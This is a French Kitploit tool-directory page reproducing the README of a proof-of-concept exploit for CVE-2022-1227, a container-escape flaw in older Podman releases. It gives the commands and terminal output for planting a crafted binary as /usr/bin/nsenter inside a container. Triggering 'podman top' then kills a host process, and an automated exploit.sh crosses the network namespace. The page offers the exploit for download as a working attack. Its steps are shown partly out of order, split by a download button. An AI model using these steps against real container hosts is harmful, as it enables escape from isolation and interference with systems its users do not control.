Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1227_Exploit — Un script pour exploiter CVE-2022-1227 | Kitploit
Outils/GitHubGitHub/louisliunova/cve-2022-1227_exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingÉvasion de Conteneur
GitHublouisliunova/cve-2022-1227_exploit

CVE-2022-1227_Exploit

Un script pour exploiter CVE-2022-1227

Voir le dépôt
14il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1227_Exploit

Un script pour exploiter la CVE-2022-1227.

Contexte

  • Ubuntu 20.10 est recommandé.
  • Podman <4.0.0 ; 3.4.4 est recommandé.

TODO : ajouter le principe de cette vulnérabilité

Installer podman

Suivre les instructions du document officiel : https://podman.io/getting-started/installation#installing-on-linux

Pour Ubuntu 20.10, la commande d'installation devrait être :

root@kitploit:~
sudo apt-get install podman=3.4.4+ds1-1ubuntu1

Démarrage rapide

Exploit simple

Dans cette section, nous essayons un simple PoC pour franchir la limite du PID namespace et kill un processus sur l'hôte.

Voici les étapes :

  1. Lancer un conteneur avec la commande suivante : podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Exécuter keep dans ./exp/bin et récupérer le PID sous lequel il s'exécute. En général, il affiche son PID sur le terminal. Comme le binaire est configuré pour dormir pendant 600 secondes, il faut peut-être être rapide pour terminer les étapes suivantes.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. Modifier le code source dans ./exp/src/sendsig.c et renseigner le PID obtenu à l'étape précédente dans la variable pid.

    root@kitploit:~
    int pid = OLD_VAL;
    

    en

    root@kitploit:~
    int pid = 7719;
    
  4. Placer le binaire compilé dans le podman interne : podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

Exploit complet

Dans cette section, nous utilisons des sockets pour réaliser la communication inter-processus par socket entre le client dans le conteneur et le serveur sur l'hôte, ce qui est généralement impossible lorsque le mécanisme d'isolation est complet. Nous utilisons cette vulnérabilité pour franchir l'isolation du namespace réseau afin de réaliser cet exploit.

Tout d'abord, entrer dans le répertoire avec cd ./exp ;

En exécutant simplement ./exploit.sh, tout sera fait automatiquement ; si tout se passe bien, le serveur affichera :

root@kitploit:~
Hello from the container!

Cela signifie que nous avons traversé le namespace réseau et que nous nous sommes échappés.

Télécharger l’outil
  • Exécuter podman top pour déclencher la vulnérabilité : podman top -l

  • Si tout se passe bien, le processus keep en cours d'exécution sera tué immédiatement. C'est inhabituel, car normalement les processus à l'intérieur du conteneur ne peuvent pas envoyer de signaux aux processus de l'hôte en raison de l'isolation du PID namespace.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed